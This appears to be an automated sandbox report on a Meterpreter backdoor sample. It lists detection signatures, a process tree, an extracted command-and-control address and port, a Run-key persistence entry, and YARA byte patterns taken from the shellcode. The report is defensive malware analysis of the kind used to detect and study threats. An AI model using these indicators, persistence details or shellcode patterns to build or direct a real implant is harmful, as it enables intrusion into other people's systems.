Edit tour

Windows Analysis Report
sNifdpWiY9.exe

Overview

General Information

Sample name:	sNifdpWiY9.exe renamed because original name is a hash value
Original sample name:	2c9c4c1ca31e6b9152ee5f772f6689fa2aa9df95e155aecbe4ef0ed054bfce3c.exe
Analysis ID:	1569044
MD5:	897699bdf92b6380fa7abd4fda6794ca
SHA1:	16e0a3d46f9850c3f1c638c62607890068eb0423
SHA256:	2c9c4c1ca31e6b9152ee5f772f6689fa2aa9df95e155aecbe4ef0ed054bfce3c
Tags:	exeshenkuser-JAMESWT_MHT
Infos:

Detection

Metasploit, Meterpreter

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Yara detected Metasploit Payload

Yara detected Meterpreter

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to inject threads in other processes

Found direct / indirect Syscall (likely to bypass EDR)

Sigma detected: Potentially Suspicious Malware Callback Communication

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to dynamically determine API calls

Contains functionality to launch a program with higher privileges

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found decision node followed by non-executed suspicious APIs

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the installation date of Windows

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

sNifdpWiY9.exe (PID: 4900 cmdline: "C:\Users\user\Desktop\sNifdpWiY9.exe" MD5: 897699BDF92B6380FA7ABD4FDA6794CA)

conhost.exe (PID: 508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

systemupdate.exe (PID: 5912 cmdline: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe C:\Users\user\AppData\Roaming\SystemCache\google.bin MD5: 2EDDBA95F5818EF402BFE7FBAA0F6A18)

conhost.exe (PID: 180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sNifdpWiY9.exe (PID: 3452 cmdline: "C:\Users\user\Desktop\sNifdpWiY9.exe" MD5: 897699BDF92B6380FA7ABD4FDA6794CA)

conhost.exe (PID: 1264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sNifdpWiY9.exe (PID: 3808 cmdline: "C:\Users\user\Desktop\sNifdpWiY9.exe" MD5: 897699BDF92B6380FA7ABD4FDA6794CA)

conhost.exe (PID: 6348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sNifdpWiY9.exe (PID: 1876 cmdline: "C:\Users\user\Desktop\sNifdpWiY9.exe" MD5: 897699BDF92B6380FA7ABD4FDA6794CA)

conhost.exe (PID: 6028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sNifdpWiY9.exe (PID: 1860 cmdline: "C:\Users\user\Desktop\sNifdpWiY9.exe" MD5: 897699BDF92B6380FA7ABD4FDA6794CA)

conhost.exe (PID: 2384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Meterpreter		No Attribution	http://schierlm.users.sourceforge.net/avevasion.html http://www.secureworks.com/research/threat-profiles/gold-franklin http://www.secureworks.com/research/threat-profiles/gold-winter https://asec.ahnlab.com/en/53046/ https://asec.ahnlab.com/en/56236/	https://malpedia.caad.fkie.fraunhofer.de/details/win.meterpreter

Malware Configuration

Threatname: Meterpreter

{"Type": "tcp", "IP": "89.84.63.139", "Port": 4444}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.2494352245.000001DE4A43D000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Metasploit_38b8ceec	Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon).	unknown	0x139e:$a1: 89 E5 31 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF 31 C0 AC 3C 61
00000009.00000002.2494352245.000001DE4A43D000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Metasploit_7bc0f998	Identifies the API address lookup function leverage by metasploit shellcode	unknown	0x1277:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61 0x14af:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61 0x15fd:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
00000009.00000002.2494352245.000001DE4A43D000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Metasploit_c9773203	Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.	unknown	0x12e3:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1 0x151b:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1 0x1669:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
00000009.00000002.2494768618.000001DE4A640000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Metasploit_38b8ceec	Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon).	unknown	0x61c3e:$a1: 89 E5 31 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF 31 C0 AC 3C 61
00000009.00000002.2494768618.000001DE4A640000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Metasploit_7bc0f998	Identifies the API address lookup function leverage by metasploit shellcode	unknown	0x61b17:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61 0x61d4f:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61 0x61e9d:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
00000009.00000002.2494768618.000001DE4A640000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Metasploit_c9773203	Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.	unknown	0x61b83:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1 0x61dbb:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1 0x61f09:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
00000009.00000002.2494296675.000001DE4A433000.00000002.00001000.00020000.00000000.sdmp	JoeSecurity_Meterpreter	Yara detected Meterpreter	Joe Security
00000009.00000002.2494296675.000001DE4A433000.00000002.00001000.00020000.00000000.sdmp	MALWARE_Win_Meterpreter	Detects Meterpreter payload	ditekSHen	0xa58:$s1: PACKET TRANSMIT 0xa68:$s2: PACKET RECEIVE 0x9c8:$s3: \\%s\pipe\%s 0xa08:$s3: \\%s\pipe\%s 0x940:$s4: %04x-%04x:%s 0x821c:$s5: server.dll
00000009.00000002.2494041747.000001DE4A3D4000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Meterpreter	Yara detected Meterpreter	Joe Security
00000009.00000002.2494041747.000001DE4A3D4000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Metasploit_38b8ceec	Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon).	unknown	0x2cd9e:$a1: 89 E5 31 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF 31 C0 AC 3C 61
00000009.00000002.2494041747.000001DE4A3D4000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Metasploit_7bc0f998	Identifies the API address lookup function leverage by metasploit shellcode	unknown	0x2cc77:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61 0x2ceaf:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61 0x2cffd:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
00000009.00000002.2494041747.000001DE4A3D4000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Metasploit_c9773203	Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.	unknown	0x2cce3:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1 0x2cf1b:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1 0x2d069:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
00000009.00000002.2494041747.000001DE4A3D4000.00000040.00001000.00020000.00000000.sdmp	MALWARE_Win_Meterpreter	Detects Meterpreter payload	ditekSHen	0x22e58:$s1: PACKET TRANSMIT 0x22e68:$s2: PACKET RECEIVE 0x22dc8:$s3: \\%s\pipe\%s 0x22e08:$s3: \\%s\pipe\%s 0x22d40:$s4: %04x-%04x:%s 0x2a61c:$s5: server.dll
Click to see the 8 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.systemupdate.exe.1de4a6736a0.3.raw.unpack	JoeSecurity_MetasploitPayload_2	Yara detected Metasploit Payload	Joe Security
9.2.systemupdate.exe.1de4a6736a0.3.raw.unpack	JoeSecurity_Meterpreter	Yara detected Meterpreter	Joe Security
9.2.systemupdate.exe.1de4a6736a0.3.raw.unpack	Windows_Trojan_Metasploit_38b8ceec	Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon).	unknown	0x2e59e:$a1: 89 E5 31 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF 31 C0 AC 3C 61
9.2.systemupdate.exe.1de4a6736a0.3.raw.unpack	Windows_Trojan_Metasploit_7bc0f998	Identifies the API address lookup function leverage by metasploit shellcode	unknown	0x2e477:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61 0x2e6af:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61 0x2e7fd:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
9.2.systemupdate.exe.1de4a6736a0.3.raw.unpack	Windows_Trojan_Metasploit_c9773203	Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.	unknown	0x2e4e3:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1 0x2e71b:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1 0x2e869:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
9.2.systemupdate.exe.1de4a6736a0.3.raw.unpack	MALWARE_Win_Meterpreter	Detects Meterpreter payload	ditekSHen	0x24658:$s1: PACKET TRANSMIT 0x24668:$s2: PACKET RECEIVE 0x245c8:$s3: \\%s\pipe\%s 0x24608:$s3: \\%s\pipe\%s 0x24540:$s4: %04x-%04x:%s 0x2be1c:$s5: server.dll
9.2.systemupdate.exe.1de4a3d0000.0.unpack	JoeSecurity_Meterpreter	Yara detected Meterpreter	Joe Security
9.2.systemupdate.exe.1de4a3d0000.0.unpack	Windows_Trojan_Metasploit_38b8ceec	Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon).	unknown	0x2e3e6:$a1: 89 E5 31 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF 31 C0 AC 3C 61
9.2.systemupdate.exe.1de4a3d0000.0.unpack	Windows_Trojan_Metasploit_7bc0f998	Identifies the API address lookup function leverage by metasploit shellcode	unknown	0x2e2bf:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61 0x2e4f7:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61 0x2e645:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
9.2.systemupdate.exe.1de4a3d0000.0.unpack	Windows_Trojan_Metasploit_c9773203	Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.	unknown	0x2e32b:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1 0x2e563:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1 0x2e6b1:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
9.2.systemupdate.exe.1de4a3d4000.1.raw.unpack	JoeSecurity_Meterpreter	Yara detected Meterpreter	Joe Security
9.2.systemupdate.exe.1de4a3d0000.0.unpack	MALWARE_Win_Meterpreter	Detects Meterpreter payload	ditekSHen	0x244a0:$s1: PACKET TRANSMIT 0x244b0:$s2: PACKET RECEIVE 0x24410:$s3: \\%s\pipe\%s 0x24450:$s3: \\%s\pipe\%s 0x24388:$s4: %04x-%04x:%s 0x2bc64:$s5: server.dll
9.2.systemupdate.exe.1de4a3d4000.1.raw.unpack	Windows_Trojan_Metasploit_38b8ceec	Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon).	unknown	0x2cd9e:$a1: 89 E5 31 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF 31 C0 AC 3C 61
9.2.systemupdate.exe.1de4a3d4000.1.raw.unpack	Windows_Trojan_Metasploit_7bc0f998	Identifies the API address lookup function leverage by metasploit shellcode	unknown	0x2cc77:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61 0x2ceaf:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61 0x2cffd:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
9.2.systemupdate.exe.1de4a3d4000.1.raw.unpack	Windows_Trojan_Metasploit_c9773203	Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.	unknown	0x2cce3:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1 0x2cf1b:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1 0x2d069:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
9.2.systemupdate.exe.1de4a3d4000.1.raw.unpack	MALWARE_Win_Meterpreter	Detects Meterpreter payload	ditekSHen	0x22e58:$s1: PACKET TRANSMIT 0x22e68:$s2: PACKET RECEIVE 0x22dc8:$s3: \\%s\pipe\%s 0x22e08:$s3: \\%s\pipe\%s 0x22d40:$s4: %04x-%04x:%s 0x2a61c:$s5: server.dll
9.2.systemupdate.exe.1de4a410000.2.unpack	JoeSecurity_Meterpreter	Yara detected Meterpreter	Joe Security
9.2.systemupdate.exe.1de4a410000.2.unpack	Windows_Trojan_Metasploit_38b8ceec	Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon).	unknown	0x2cd9e:$a1: 89 E5 31 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF 31 C0 AC 3C 61
9.2.systemupdate.exe.1de4a410000.2.unpack	Windows_Trojan_Metasploit_7bc0f998	Identifies the API address lookup function leverage by metasploit shellcode	unknown	0x2cc77:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61 0x2ceaf:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61 0x2cffd:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
9.2.systemupdate.exe.1de4a410000.2.unpack	Windows_Trojan_Metasploit_c9773203	Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.	unknown	0x2cce3:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1 0x2cf1b:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1 0x2d069:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
9.2.systemupdate.exe.1de4a410000.2.unpack	MALWARE_Win_Meterpreter	Detects Meterpreter payload	ditekSHen	0x22e58:$s1: PACKET TRANSMIT 0x22e68:$s2: PACKET RECEIVE 0x22dc8:$s3: \\%s\pipe\%s 0x22e08:$s3: \\%s\pipe\%s 0x22d40:$s4: %04x-%04x:%s 0x2a61c:$s5: server.dll
9.2.systemupdate.exe.1de4a6736a0.3.unpack	JoeSecurity_Meterpreter	Yara detected Meterpreter	Joe Security
9.2.systemupdate.exe.1de4a6736a0.3.unpack	Windows_Trojan_Metasploit_38b8ceec	Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon).	unknown	0x2bbe6:$a1: 89 E5 31 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF 31 C0 AC 3C 61
9.2.systemupdate.exe.1de4a6736a0.3.unpack	Windows_Trojan_Metasploit_7bc0f998	Identifies the API address lookup function leverage by metasploit shellcode	unknown	0x2babf:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61 0x2bcf7:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61 0x2be45:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
9.2.systemupdate.exe.1de4a6736a0.3.unpack	Windows_Trojan_Metasploit_c9773203	Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.	unknown	0x2bb2b:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1 0x2bd63:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1 0x2beb1:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
9.2.systemupdate.exe.1de4a6736a0.3.unpack	MALWARE_Win_Meterpreter	Detects Meterpreter payload	ditekSHen	0x21ca0:$s1: PACKET TRANSMIT 0x21cb0:$s2: PACKET RECEIVE 0x21c10:$s3: \\%s\pipe\%s 0x21c50:$s3: \\%s\pipe\%s 0x21b88:$s4: %04x-%04x:%s 0x29464:$s5: server.dll
9.2.systemupdate.exe.1de4a3d4000.1.unpack	JoeSecurity_Meterpreter	Yara detected Meterpreter	Joe Security
9.2.systemupdate.exe.1de4a3d4000.1.unpack	Windows_Trojan_Metasploit_c9773203	Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.	unknown	0x2ba69:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
9.2.systemupdate.exe.1de4a3d4000.1.unpack	MALWARE_Win_Meterpreter	Detects Meterpreter payload	ditekSHen	0x22258:$s1: PACKET TRANSMIT 0x22268:$s2: PACKET RECEIVE 0x221c8:$s3: \\%s\pipe\%s 0x22208:$s3: \\%s\pipe\%s 0x22140:$s4: %04x-%04x:%s 0x29a1c:$s5: server.dll
Click to see the 24 entries

Sigma Signatures

System Summary

Sigma detected: Potentially Suspicious Malware Callback Communication

Source: Network Connection

Author: Florian Roth (Nextron Systems): Data: DestinationIp: 89.84.63.139, DestinationIsIpv6: false, DestinationPort: 4444, EventID: 3, Image: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe, Initiated: true, ProcessId: 5912, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49702

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Desktop\sNifdpWiY9.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\sNifdpWiY9.exe, ProcessId: 4900, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemUpdate

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 9.2.systemupdate.exe.1de4a3d4000.1.raw.unpack

Malware Configuration Extractor: Meterpreter {"Type": "tcp", "IP": "89.84.63.139", "Port": 4444}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 87.4% probability

Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_00007FF6EC321490 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDestroyHash,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,GetLastError,GetLastError,CryptDestroyKey,CryptReleaseContext,exit,GetLastError,CryptDestroyHash,GetLastError,GetLastError,	9_2_00007FF6EC321490
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_00007FF6EC328679 CryptDestroyKey,	9_2_00007FF6EC328679
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_00007FF6EC32F280 CryptDestroyKey,	9_2_00007FF6EC32F280
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_00007FF6EC32F290 CryptReleaseContext,	9_2_00007FF6EC32F290
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_00007FF6EC328661 CryptReleaseContext,	9_2_00007FF6EC328661
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A4174BC calloc,htonl,htonl,CryptDuplicateKey,GetLastError,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,memmove_s,htonl,htonl,malloc,memcpy_s,CryptDestroyKey,	9_2_000001DE4A4174BC
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A4178D0 calloc,CryptAcquireContextW,GetLastError,CryptGenRandom,GetLastError,CryptImportKey,free,	9_2_000001DE4A4178D0
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A417678 memcpy_s,CryptDuplicateKey,GetLastError,CryptSetKeyParam,CryptGenRandom,GetLastError,CryptSetKeyParam,htonl,malloc,memcpy_s,CryptEncrypt,GetLastError,htonl,memcpy_s,memcpy_s,malloc,htonl,memcpy_s,memcpy_s,CryptDestroyKey,	9_2_000001DE4A417678
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A417AC8 CryptDestroyKey,CryptReleaseContext,free,	9_2_000001DE4A417AC8
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A417B28 CryptDecodeObjectEx,GetLastError,CryptAcquireContextW,CryptAcquireContextW,CryptImportPublicKeyInfo,CryptEncrypt,calloc,memcpy_s,CryptEncrypt,free,LocalFree,CryptDestroyKey,CryptReleaseContext,	9_2_000001DE4A417B28

Source: unknown	HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.7:49735 version: TLS 1.2

Source: sNifdpWiY9.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rbp	0_2_00007FF75F960690
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rdi	0_2_00007FF75F944440
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then lea rdx, qword ptr [rbp-31h]	0_2_00007FF75F98F0C0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rbx	0_2_00007FF75F8BF096
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then mov r8d, dword ptr [rdx+04h]	0_2_00007FF75F8C8F80
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push r13	0_2_00007FF75F8FFEE0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rbx	0_2_00007FF75F98DE50
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rsi	0_2_00007FF75F91ADD0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rsi	0_2_00007FF75F8E8CD0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rbp	0_2_00007FF75F962BA0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rsi	0_2_00007FF75F8FDC00
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then mov r8d, dword ptr [rax+r9]	0_2_00007FF75F8C3AC0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then mov eax, dword ptr [rsi]	0_2_00007FF75F8C9B10
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 5x nop then mov r9d, r8d	0_2_00007FF75F937A40
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rsi	0_2_00007FF75F98CA80
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rdi	0_2_00007FF75F8FFA70
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rbp	0_2_00007FF75F8FFA70
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rdi	0_2_00007FF75F8FFA70
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rbp	0_2_00007FF75F8FFA70
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 5x nop then lea edx, dword ptr [r9+r9*4]	0_2_00007FF75F8C1A90
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 5x nop then mov rax, rcx	0_2_00007FF75F8D2A00
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then mov rax, rcx	0_2_00007FF75F8E1940
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then mov eax, dword ptr [rcx+10h]	0_2_00007FF75F8E0870
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then mov eax, dword ptr [rcx]	0_2_00007FF75F8C6640
